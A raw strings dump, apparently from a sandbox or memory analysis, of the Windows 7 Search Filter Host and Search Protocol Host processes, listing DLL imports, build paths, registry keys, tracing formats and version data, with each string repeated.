SearchFilterHost.exe_3408:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
ADVAPI32.dll
ADVAPI32.dll
ntdll.DLL
ntdll.DLL
KERNEL32.dll
KERNEL32.dll
msvcrt.dll
msvcrt.dll
USER32.dll
USER32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
TQUERY.DLL
TQUERY.DLL
IMM32.dll
IMM32.dll
MSSHooks.dll
MSSHooks.dll
mscoree.dll
mscoree.dll
SHLWAPI.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyW
RegDeleteKeyExW
RegDeleteKeyExW
8%uiP
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
ReportEventW
ReportEventW
_amsg_exit
_amsg_exit
SearchFilterHost.pdb
SearchFilterHost.pdb
version="5.1.0.0"
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
name="Microsoft.Windows.Search.MSSFH"
3 3(30383|3
3 3(30383|3
kernel32.dll
kernel32.dll
Software\Microsoft\Windows Search
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
Windows Search Service
Windows Search Service
tquery.dll
tquery.dll
advapi32.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
0xx%p%S%d
0xx%p%S%d
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
Software\Microsoft\Windows Search\Tracing\EventThrottleState
0xx=
0xx=
%S(%d)
%S(%d)
tid="0x%x"
tid="0x%x"
pid="0x%x"
pid="0x%x"
tagname="%S"
tagname="%S"
tagid="0x%x"
tagid="0x%x"
el="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
time="d/d/d d:d:d.d"
logname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s.mui
.\%s\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s\%s.mui
%s\%s
%s\%s
winhttp.dll
winhttp.dll
Microsoft Windows Search Filter Host
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
SearchFilterHost.exe
Windows
Windows
7.00.7601.17610
7.00.7601.17610
SearchProtocolHost.exe_1908:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
ADVAPI32.dll
ADVAPI32.dll
ntdll.DLL
ntdll.DLL
KERNEL32.dll
KERNEL32.dll
msvcrt.dll
msvcrt.dll
USER32.dll
USER32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
TQUERY.DLL
TQUERY.DLL
MSSHooks.dll
MSSHooks.dll
IMM32.dll
IMM32.dll
SHLWAPI.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSLogin
SrchDSSPortManager
SrchDSSPortManager
SrchPHHttp
SrchPHHttp
SrchIndexerQuery
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerClient
SrchIndexerSchema
SrchIndexerSchema
Msidle.dll
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyW
RegDeleteKeyExW
RegDeleteKeyExW
8%uiP
8%uiP
Invalid parameter passed to C runtime function.
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
0xx=
0xx=
%s(%d)
%s(%d)
tid="0x%x"
tid="0x%x"
pid="0x%x"
pid="0x%x"
tagname="%s"
tagname="%s"
tagid="0x%x"
tagid="0x%x"
el="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
time="d/d/d d:d:d.d"
logname="%s"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
SHELL32.dll
PROPSYS.dll
PROPSYS.dll
ntdll.dll
ntdll.dll
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
ReportEventW
ReportEventW
_amsg_exit
_amsg_exit
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
SearchProtocolHost.pdb
2 2(20282|2
2 2(20282|2
4%5S5
4%5S5
Software\Microsoft\Windows Search
Software\Microsoft\Windows Search
https
https
kernel32.dll
kernel32.dll
msTracer.dll
msTracer.dll
msfte.dll
msfte.dll
lX-X-X-XX-XXXXXX
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
tquery.dll
tquery.dll
%s\%s
%s\%s
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
Windows Search Service
Windows Search Service
0xx%p%S%d
0xx%p%S%d
advapi32.dll
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
Software\Microsoft\Windows Search\Tracing\EventThrottleState
%S(%d)
%S(%d)
tagname="%S"
tagname="%S"
logname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s.mui
.\%s\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
SearchProtocolHost.exe
Windows
Windows
7.00.7601.17610
7.00.7601.17610